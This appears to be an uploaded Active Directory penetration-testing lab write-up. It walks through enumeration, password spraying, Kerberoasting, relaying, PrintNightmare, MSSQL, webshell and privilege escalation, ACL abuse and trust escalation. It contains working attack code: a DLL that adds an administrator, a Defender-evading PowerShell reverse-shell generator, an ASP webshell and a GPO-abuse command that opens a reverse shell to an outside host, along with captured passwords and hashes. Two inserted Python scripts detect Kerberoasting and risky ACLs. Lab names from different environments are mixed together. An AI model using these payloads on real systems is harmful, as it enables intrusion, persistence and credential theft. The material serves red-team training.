Game of Pwn&Patch

The document outlines a comprehensive penetration testing methodology for Active Directory environments, detailing steps from reconnaissance to exploitation. It covers various techniques for user enumeration, password spraying, Kerberoasting, and privilege escalation, along with tools like Bloodhound, Responder, and Impacket. The document emphasizes the importance of understanding the network structure and user permissions to effectively exploit vulnerabilities and gain administrative access.

Uploaded by

Rayen Salem

Pwn&Patch

part 1 - reconnaissance and scan


Enumerate Network
First recon with cme
The first thing I personally do before launching nmap is to scan for NetBIOS results.

part 2 - find users


Enumerate DCs anonymously

We get some users along with their description, and a first password, as samwell.tarly has his password set in his description.
We could also retrieve the password policy before trying a brute force.

The password policy shows us that if we fail 5 times in 5 minutes we lock the account for 5 minutes.
With enum4linux
We get the user list, as with cme
We also get the password policy, as with cme

enum4linux also gets the full domain user list by enumerating the members of the domain group
With rpc call
The anonymous listing is done with Remote Procedure Call on winterfell (192.168.56.11), so we could also do this with rpcclient directly.
Get all domain users:

List guest access on shares

User but no credentials


ASREP-roasting

We create a users.txt file with all the user names previously found on north.sevenkingdoms.local:
Password Spray
We could try the classic user=password test

We also could use sprayhound

- We now have three pairs of credentials:
  - mohamed.mohamed:password123 (user description)
  - rayen.redteam:iseedumbpeople (asreproasting)
  - hayder:hayder (password spray)

part 3 - enumeration with user


- When you get an account on an Active Directory, the first thing to do is always to get the full list of users.
- Once you have it you can do a password spray on the full user list (very often you will find other accounts with weak passwords like username=password, SeasonYear!, SocietynameYear! or even 123456).

Kerberoasting
- On an Active Directory, we will very often see users with an SPN set.

- Let's find them with impacket

All the hashes are stored in the file named kerberoasting.hashes

hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt
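As an added defensive counterpart to the Kerberoasting above (not part of the original write-up), this Python script flags the pattern the attack leaves in a domain controller's Security log: one account requesting RC4 (etype 0x17) service tickets for several distinct user SPNs within a short window. The event records are constructed samples, and the field names are an assumption about how 4769 events were normalized.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records mirroring Security Event ID 4769 (Kerberos service
# ticket requested). Not taken from the page: account names reuse the lab's
# users, everything else is made up. etype 0x17 = RC4-HMAC, 0x12 = AES256.
SAMPLE_4769 = [
    {"ts": "2024-01-01T10:00:01", "account": "rayen.redteam@TECH.PWNPATCH.LOCAL", "service": "sql_svc", "etype": "0x17", "status": "0x0"},
    {"ts": "2024-01-01T10:00:02", "account": "rayen.redteam@TECH.PWNPATCH.LOCAL", "service": "web_svc", "etype": "0x17", "status": "0x0"},
    {"ts": "2024-01-01T10:00:02", "account": "rayen.redteam@TECH.PWNPATCH.LOCAL", "service": "backup_svc", "etype": "0x17", "status": "0x0"},
    # machine-account and krbtgt tickets are not crackable targets: ignored below
    {"ts": "2024-01-01T10:00:03", "account": "rayen.redteam@TECH.PWNPATCH.LOCAL", "service": "PWNANDPATCHDC2$", "etype": "0x17", "status": "0x0"},
    {"ts": "2024-01-01T10:00:04", "account": "rayen.redteam@TECH.PWNPATCH.LOCAL", "service": "krbtgt", "etype": "0x17", "status": "0x0"},
    # normal AES traffic from a user opening the same services
    {"ts": "2024-01-01T10:05:00", "account": "hayder@TECH.PWNPATCH.LOCAL", "service": "sql_svc", "etype": "0x12", "status": "0x0"},
    {"ts": "2024-01-01T10:05:01", "account": "hayder@TECH.PWNPATCH.LOCAL", "service": "web_svc", "etype": "0x12", "status": "0x0"},
    {"ts": "2024-01-01T10:05:02", "account": "hayder@TECH.PWNPATCH.LOCAL", "service": "backup_svc", "etype": "0x12", "status": "0x0"},
    # a single RC4 request (legacy client) stays below the threshold
    {"ts": "2024-01-01T11:00:00", "account": "mohamed.mohamed@TECH.PWNPATCH.LOCAL", "service": "sql_svc", "etype": "0x17", "status": "0x0"},
]

RC4_ETYPES = {"0x17", "0x18"}  # rc4-hmac and rc4-hmac-exp


def is_roastable_request(ev):
    """Successful TGS request, RC4 encrypted, for a user (not machine) service account."""
    svc = ev["service"]
    return (ev["status"] == "0x0"
            and ev["etype"].lower() in RC4_ETYPES
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def kerberoast_alerts(events, window=timedelta(seconds=60), min_services=3):
    """Return {account: [services]} for every account that requested RC4 tickets
    for at least min_services distinct user SPNs inside one sliding window."""
    per_account = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            per_account[ev["account"]].append((datetime.fromisoformat(ev["ts"]), ev["service"]))
    alerts = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(in_window) >= min_services:
                alerts[account] = sorted(in_window)
                break
    return alerts


if __name__ == "__main__":
    for account, services in kerberoast_alerts(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

Service accounts that still have AES disabled legitimately produce 0x17 tickets, so the threshold and window need tuning per environment.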
Share enum

- We have a domain user, so we can enumerate the shares again, this time with a user account

Now a new share folder is readable

Bloodhound
- Bloodhound is one of the best tools for an Active Directory pentest. It will help you find all the paths to pwn the AD and is a must-have in your arsenal!

- To launch Bloodhound you first need to retrieve all the data from the different domains.

Python ingestor - from Linux


- First we will get the data with the python ingestor:

- Let's run the script on tech.pwnpatch.local:

- OK, now we have all the information from the domain tech.pwnpatch.local. Now let's try to get the information from the other domain, pwnpatch.local:

part 4 - poison and relay


Responder
- The NetNTLM hashes are not usable for pass-the-hash, but you can crack them to retrieve the password.
- We create a file responder.hashes with the two hashes found and start cracking it with hashcat.

- We quickly get another user account, achraf.redteam:simplythebest. This is enough to pwn the tech domain as achraf is an administrator of pwnandpatchdc2 (the tech DC).

- ahmed's password is stronger and cannot be broken with this method. This doesn't mean we can do nothing: what we could do is relay ahmed's connection to a server where SMB is not signed ;)

Unsigned SMB
Secretsdump
secretsdump.py 'tech'/'achraf.redteam':'simplythebest'@'192.168.45.11'
ahmed.redteam:1111:aad3b435b51404eeaad3b435b51404ee:631d04565376e65a375fcad27b89390c:::
secretsdump.py -hashes ':631d04565376e65a375fcad27b89390c' 'tech'/'ahmed.redteam'@'192.168.45.22'

- The SAM database contains the local accounts. We will ignore vagrant as it is the default user used to set up the lab.
- The important information here is the NT hash of the local administrator user.
- We also get the LSA cache of the last connected users (by default Windows keeps the last 10 users); this is useful to connect to the server even if the domain controller is unreachable. But those cached credentials can be cracked offline with hashcat (very slow).
- And to finish we also get the hash of the computer account. (Sometimes you will get no useful domain accounts or no information at all on a domain-joined computer, but if you get this hash you have an account on the domain!)
Lsassy
- Use lsassy to get the credentials stored in the lsass process
- Domain account information is stored in the LSASS process, so dumping this process can give you more domain accounts and privileges.
- Lsassy lets you dump lsass remotely (far more convenient than doing a procdump, downloading the lsass dump file and running pypykatz or mimikatz locally); it does all the painful actions like dumping and reading the lsass content for you (it also dumps only the useful part of the lsass dump, optimizing transfer time). (lsassy also exists as a cme module.)

Smbclient

- Connect directly to the SMB server with smbclient


Code execution: smbexec

part 5 - exploit with user

Check if we can add a computer


For this attack I will use the tech/dev.ops:iknownimthebest account, as we previously obtained it with Kerberoasting in part 3.

Let’s find a cme module to check the machine account quota

PrintNightmare
To exploit PrintNightmare we will first check if the spooler is active on the targets
Check the spooler is active

- With cme

- With impacket rpcdump

Prepare the DLL

- Let's prepare the exploitation DLL

- We will create a user and add it as local administrator
- Create the file nightmare.c

#include <windows.h>
#include <stdlib.h>

int RunCMD()
{
    system("net users pnightmare Passw0rd123. /add");
    system("net localgroup administrators pnightmare /add");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        RunCMD();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c

Exploit on a vulnerable Windows Server 2019 (pwnandpatchdc2)

- Now exploit a vulnerable Windows Server 2019

- With this payload we can bypass Defender and add our user as administrator
- Compile

x86_64-w64-mingw32-gcc -shared -o pnightmare2.dll adduser.c -lnetapi32

- Prepare the share

Launch the exploit

python3 CVE-2021-1675.py tech.pwnpatch.local/dev.ops:'iknowimthebest'@pwnandpatchdc2.tech.pwnpatch.local '\\192.168.45.5\ATTACKERSHARE\pnightmare2.dll'

- And enjoy your new admin account by dumping the NTDS :)


part 7 - MSSQL
Enumerate the MSSQL servers
Impacket GetUserSPNs.py

- First let's try to figure out the users with an SPN on an MSSQL server

python3 GetUserSPNs.py tech.pwnpatch.local/rayen.redteam:iseedumbpeople

Nmap
CrackMapExec

- Let's try with crackmapexec

Impacket

- To enumerate and use MSSQL, use the impacket example mssqlclient.py.

- Let's start the enumeration:


- We see only a basic view as we are a simple user

- Let's enumerate the impersonation values:

- OK, samwell has login impersonation to the user sa.

- So we can impersonate sa with EXECUTE AS LOGIN and execute commands with xp_cmdshell

- Let's continue our enumeration, as login sa this time:

- As we can see, with the sa login we see a lot more things, and we can see that jon.snow is sysadmin on the MSSQL server
- Let's see if there are other impersonation privileges:

- As a sysadmin user (sa), we can see all the information in the database, and so the other users with impersonation privileges.

Coerce and relay

- MSSQL can also be used to coerce an NTLM authentication from the MSSQL server. The incoming connection will be from the user who runs the MSSQL server.
- In our case if we take any user, hodor for example, we can get an NTLM authentication
- Start responder: responder -I vboxnet0
- Connect with hodor (0 privileges)

python3 mssqlclient.py -windows-auth north.sevenkingdoms.local/hodor:[email protected]

Command execution to shell

- We got command execution on castelblack and also on braavos. But now we want a shell to interact with the server.
- To get a shell we can use a basic PowerShell reverse shell (there is one available in the arsenal commands cheatsheet project; this is another of my projects that I will need to improve when I get the time, but this script does not bypass Defender anymore, so let's write some modifications):

#!/usr/bin/env python
import base64
import sys

if len(sys.argv) < 3:
    print('usage : %s ip port' % sys.argv[0])
    sys.exit(0)

payload = """
$c = New-Object System.Net.Sockets.TCPClient('%s',%s);
$s = $c.GetStream();[byte[]]$b = 0..65535|%%{0};
while(($i = $s.Read($b, 0, $b.Length)) -ne 0){
    $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);
    $sb = (iex $d 2>&1 | Out-String );
    $sb = ([text.encoding]::ASCII).GetBytes($sb + 'ps> ');
    $s.Write($sb,0,$sb.Length);
    $s.Flush()
};
$c.Close()
""" % (sys.argv[1], sys.argv[2])

byte = payload.encode('utf-16-le')
b64 = base64.b64encode(byte)
print("powershell -exec bypass -enc %s" % b64.decode())

Run it and get a shell

And we got a reverse shell

part 8 - Privilege escalation


IIS - webshell

- There is a simple ASP.NET application on http://192.168.45.22/; this application only gives us a simple file upload functionality.

From there we can upload a basic webshell in ASP: webshell.asp (at the time of writing, this avoids the Defender signature)

<%
Function getResult(theParam)
    Dim objSh, objResult
    Set objSh = CreateObject("WScript.Shell")
    Set objResult = objSh.exec(theParam)
    getResult = objResult.StdOut.ReadAll
End Function
%>
<HTML>
<BODY>
Enter command:
<FORM action="" method="POST">
<input type="text" name="param" size=45 value="<%= myValue %>">
<input type="submit" value="Run">
</FORM>
<p>
Result :
<%
myValue = request("param")
thisDir = getResult("cmd /c" & myValue)
Response.Write(thisDir)
%>
</p>
<br>
</BODY>
</HTML>

- The webshell is uploaded in the upload folder.

- And we have command execution on the IIS server

- We can get a reverse shell with the same method used for MSSQL
- As the IIS service user we have the SeImpersonatePrivilege privilege! (same thing on MSSQL, the service has this permission by default)

SeImpersonatePrivilege to Authority\System

- To escalate privileges from our IIS (or MSSQL) user with SeImpersonatePrivilege to Authority\System we can use one of the "potato" techniques.

- A wonderful blog post explains the different potatoes here: https://jlajara.gitlab.io/Potatoes_Windows_Privesc

- So let's use SweetPotato, a compilation of all the techniques, "the potato to rule them all".
- OK so we clone the project and compile it with Visual Studio

- Prepare a bat file to run our basic PowerShell reverse shell on execution

- Prepare the listener

- With our reverse shell, run the following command

part 9 - Lateral move


Give me your secrets
Before jumping from computer to computer we must get the secrets of the owned machine.
Windows has a lot of different secrets stored in different places.
Let's launch impacket secretsdump.py and see what we get:

Lateral Move with impacket


PsExec

- PsExec:
  - upload an executable
  - create a service to run the executable
  - communicate with the service through a named pipe
  - Protocol: SMB

python3 psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e2c81c0ad55547b1b6736480360dc72d' TECH/[email protected]

part 11 - ACL

To start we will focus on the sevenkingdoms kill chain of ACLs, starting with jilany.blueteam (password: pwnpatchftw000)

- The path here is:
  - jilany -> samir: change password on user
  - samir -> hamdi: GenericWrite on user
  - hamdi -> youssef: WriteDacl on user
  - youssef -> threat intel: add member on group
  - threat intel -> support: write owner, group to group
  - support -> sales: write owner on group
  - sales -> saif: GenericAll on user
  - saif -> pwnandpatchdc1: GenericAll on computer
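As an added defensive check for the rights this chain abuses (not part of the original write-up), the Python below parses a DACL in SDDL form and reports every ACE that grants GenericAll, GenericWrite, WriteDacl, WriteOwner, ForceChangePassword or a write to the member attribute to a principal outside a trusted baseline. The DACL string and its SIDs are constructed samples; the two GUIDs are the well-known User-Force-Change-Password and member schema values.

```python
import re

# Constructed sample DACL in SDDL form. It is NOT from the page; the SIDs are
# made up (S-1-5-21-111-222-333-<rid>) and stand for principals in the chain above.
SAMPLE_DACL = (
    "D:AI"
    "(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-5-32-544)"                                  # BUILTIN\Administrators: expected
    "(A;;GA;;;S-1-5-18)"                                                        # SYSTEM: expected
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-111-222-333-1105)"  # ForceChangePassword
    "(A;;WD;;;S-1-5-21-111-222-333-1107)"                                       # WriteDacl
    "(A;;WO;;;S-1-5-21-111-222-333-1110)"                                       # WriteOwner
    "(OA;;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-111-222-333-1109)"  # write to 'member'
    "(A;;RPLCRC;;;S-1-5-21-111-222-333-1200)"                                   # read only: fine
    "(A;;GW;;;S-1-5-21-111-222-333-512)"                                        # Domain Admins: expected
)

# One SDDL ACE: (type;flags;rights;object_guid;inherit_object_guid;sid)
ACE_RE = re.compile(r"\((\w+);(\w*);(\w*);([\w-]*);([\w-]*);([\w-]+)\)")

# Generic rights abbreviations that hand over control of the object
CONTROL_RIGHTS = {"GA": "GenericAll", "GW": "GenericWrite", "WD": "WriteDacl", "WO": "WriteOwner"}
# Well-known AD GUIDs used by the chain above
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password
MEMBER_ATTRIBUTE = "bf9679c0-0de6-11d0-a285-00aa003049e2"       # 'member' attribute / Self-Membership
# Principals expected to hold full control; anything else is reported
TRUSTED_SIDS = {"S-1-5-18", "S-1-5-32-544"}
TRUSTED_RIDS = ("-512", "-519")  # Domain Admins, Enterprise Admins


def split_rights(rights):
    """'RPWPGA' -> ['RP', 'WP', 'GA']; a hex access mask is returned unchanged."""
    if rights.lower().startswith("0x"):
        return [rights]
    return [rights[i:i + 2] for i in range(0, len(rights), 2)]


def dangerous_aces(sddl):
    """List (sid, [rights]) for allow ACEs granting control rights to non-trusted principals."""
    findings = []
    for ace_type, _flags, rights, obj_guid, _inherit, sid in ACE_RE.findall(sddl):
        if ace_type not in ("A", "OA"):  # deny ACEs never grant anything
            continue
        if sid in TRUSTED_SIDS or sid.endswith(TRUSTED_RIDS):
            continue
        codes = split_rights(rights)
        guid = obj_guid.lower()
        named = [CONTROL_RIGHTS[c] for c in codes if c in CONTROL_RIGHTS]
        if "CR" in codes and guid in ("", FORCE_CHANGE_PASSWORD):   # no GUID = all extended rights
            named.append("ForceChangePassword" if guid else "AllExtendedRights")
        if "WP" in codes and guid in ("", MEMBER_ATTRIBUTE):        # no GUID = every property
            named.append("AddMember" if guid else "WriteAllProperties")
        if "SW" in codes and guid == MEMBER_ATTRIBUTE:
            named.append("AddSelf")
        if named:
            findings.append((sid, sorted(named)))
    return findings


if __name__ == "__main__":
    for sid, rights in dangerous_aces(SAMPLE_DACL):
        print(f"{sid}: {', '.join(rights)}")
```

Run it against the SDDL exported from each sensitive user, group and computer object (for example with the nTSecurityDescriptor attribute) to find delegations like the ones in the path above before they are abused.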

ForceChangePassword on User (jilany -> samir)


- This one should never be done in a pentest (unless the customer is OK with that). You don't want to lock a user out during your audit.
- As jilany.blueteam we will change samir.blueteam's password

- We set the new samir password.

- And verify the password is OK.

GenericWrite on User (samir -> hamdi)


Targeted Kerberoasting

- First let's do a targeted Kerberoasting; the principle is simple: add an SPN to the user, ask for a TGS, remove the SPN from the user.
- And now we can crack the TGS just like a classic Kerberoasting.
- Shutdown has made a tool which does all the work for you: https://github.com/ShutdownRepo/targetedKerberoast

python3 targetedKerberoast.py -v -d pwnpatch.local -u samir.blueteam -p hacked --request-user hamdi.manager
Shadow Credentials
This was already done previously in this blog; one of the fastest exploitations is with certipy:

WriteDacl on User (hamdi -> youssef)


- Now we can use dacledit.py

- First let's look at hamdi's rights on youssef:

python3 dacledit.py -action 'read' -principal hamdi.manager -target 'youssef.blueteam' 'pwnpatch.local'/'hamdi.manager':'TaskKill3r'

- OK, now change the permission to "FullControl" and see the modification

python3 dacledit.py -action 'write' -rights 'FullControl' -principal hamdi.manager -target 'youssef.blueteam' 'pwnpatch.local'/'hamdi.manager':'TaskKill3r'

python3 dacledit.py -action 'read' -principal hamdi.manager -target 'youssef.blueteam' 'pwnpatch.local'/'hamdi.manager':'TaskKill3r'

- OK now we can:
  - change tyron's password
  - do a targeted Kerberoasting
  - do a shadow credentials
- Let's just use shadow credentials:

certipy-ad shadow auto -u [email protected] -p 'TaskKill3r' -account 'youssef.blueteam' -debug

Add self on Group (youssef -> threat intel)

- We now have youssef, so we can add ourselves to the threat intel group

python3 ldeep ldap -u youssef.blueteam -H ':c7fda74f5298704161c803299cce25fe' -d pwnpatch.local -s ldap://192.168.45.10 search '(sAMAccountName=youssef.blueteam)' distinguishedName
python3 ldeep ldap -u youssef.blueteam -H ':c7fda74f5298704161c803299cce25fe' -d pwnpatch.local -s ldap://192.168.45.10 search '(sAMAccountName=threat intel)' distinguishedName

Let's see the members of threat intel

- Let's add youssef to threat intel

- See the result

AddMember on Group (threat intel -> support)

- Now as youssef we are in threat intel, so we can add a member to the support group.
- So we just add youssef, just like we did before

- See the result

python3 ldeep ldap -u youssef.blueteam -H ':c7fda74f5298704161c803299cce25fe' -d pwnpatch.local -s ldap://192.168.45.10 membersof 'support'

WriteOwner on Group (support -> sales)

- Now with the WriteOwner privilege we can change the owner of sales to own the group
- Just like before we will use impacket

python3 owneredit.py -action read -target 'sales' -hashes ':c7fda74f5298704161c803299cce25fe' pwnpatch.local/youssef.blueteam

python3 owneredit.py -action write -new-owner 'youssef.blueteam' -target 'sales' -hashes ':c7fda74f5298704161c803299cce25fe' pwnpatch.local/youssef.blueteam

Let's see the result:

- And the owner of the sales group is now youssef.blueteam

- As owner of the group we can now change the ACL and give ourselves GenericAll on the group

GenericAll on User (sales -> saif)

- Now tyron is in sales, so we can take control of saif with the GenericAll on saif
- Let's change saif's password
Let's verify

GenericAll on Computer (saif -> pwnandpatchdc1)

- Shadow credentials is now included in certipy

NT hash for 'PWNANDPATCHDC1$': 4c57c7174c3e5bdd94b9ee6852ee9077

- Now we have the TGT and the NT hash of PWNANDPATCHDC1$

- Obviously we can do a DCSync because pwnandpatchdc1 is a DC, but instead let's try to directly get a shell
- To do that the easiest way is using S4U2self abuse

Machine account to administrator shell

S4U2self abuse
export KRB5CCNAME=./pwnandpatchdc1.ccache
python3 getST.py -self -impersonate "Administrator" -altservice "cifs/pwnandpatchdc1.pwnpatch.local" -k -no-pass -dc-ip 192.168.45.10 "pwnpatch.local"/'pwnandpatchdc1$'

- And then we use that ticket to connect as administrator

wmiexec.py -k -no-pass pwnpatch.local/[email protected]

GPO abuse

- There is a GPO abuse on the tech domain

- We get the ID from Bloodhound and launch the exploit with:

python3 pygpoabuse.py tech.pwnpatch.local/mohamed.mohamed:'password123' -gpo-id "B855FFB9-1FCD-4B98-A4D5-6D3E1ED1F7EB"

- Now let's try to get a PowerShell reverse shell

python3 pygpoabuse.py tech.pwnpatch.local/mohamed.mohamed:'password123' -gpo-id "B855FFB9-1FCD-4B98-A4D5-6D3E1ED1F7EB" -powershell -command "\$c = New-Object System.Net.Sockets.TCPClient('192.168.45.5',4444);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){ \$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i); \$sb = (iex \$d 2>&1 | Out-String ); \$sb = ([text.encoding]::ASCII).GetBytes(\$sb + 'ps> '); \$s.Write(\$sb,0,\$sb.Length); \$s.Flush()};\$c.Close()" -taskname "MyTask" -description "don't worry" -f

- And a few moments later we get the PowerShell reverse shell

part 12 - Trusts
Enumerate Trust
- Let's enumerate the trusts:

We can see:

- A bi-directional domain trust between tech.pwnpatch.local and pwnpatch.local (child/parent relation)

Domain Trust - child/parent (tech.pwnpatch.local -> pwnpatch.local)

- OK, now imagine you have pwned the domain tech.pwnpatch.local, you have dumped the NTDS and you have the NT hashes of all the tech domain users.

raiseChild.py tech.pwnpatch.local/ahmed.redteam:'FightP3ace!'

- This creates a golden ticket for the forest enterprise admin.
- Log into the forest and get the target info (default administrator RID: 500)
- All the job is done with one command; if you are lazy you don't even need to understand x)

Golden ticket + ExtraSid

- We have done the exploitation in one command with impacket raiseChild.py; now let's do the same step by step and create the golden ticket.
- First dump the krbtgt of the domain we own

secretsdump.py -just-dc-user tech/krbtgt tech.pwnpatch.local/ahmed.redteam:'FightP3ace!'@192.168.45.11

- Now get the child and parent domain SIDs

# dump child domain SID
lookupsid.py -domain-sids tech.pwnpatch.local/ahmed.redteam:'FightP3ace!'@192.168.45.11 0

# dump parent domain SID

And now create the golden ticket: we add "-519" at the end of the extra-sid

Trust ticket - forge inter-realm TGT


- Another way to escalate from child to parent is by extracting the trust key and using it to create our trust ticket
- The trust key can be found by targeting the NetBIOS name of the domain in the NTDS
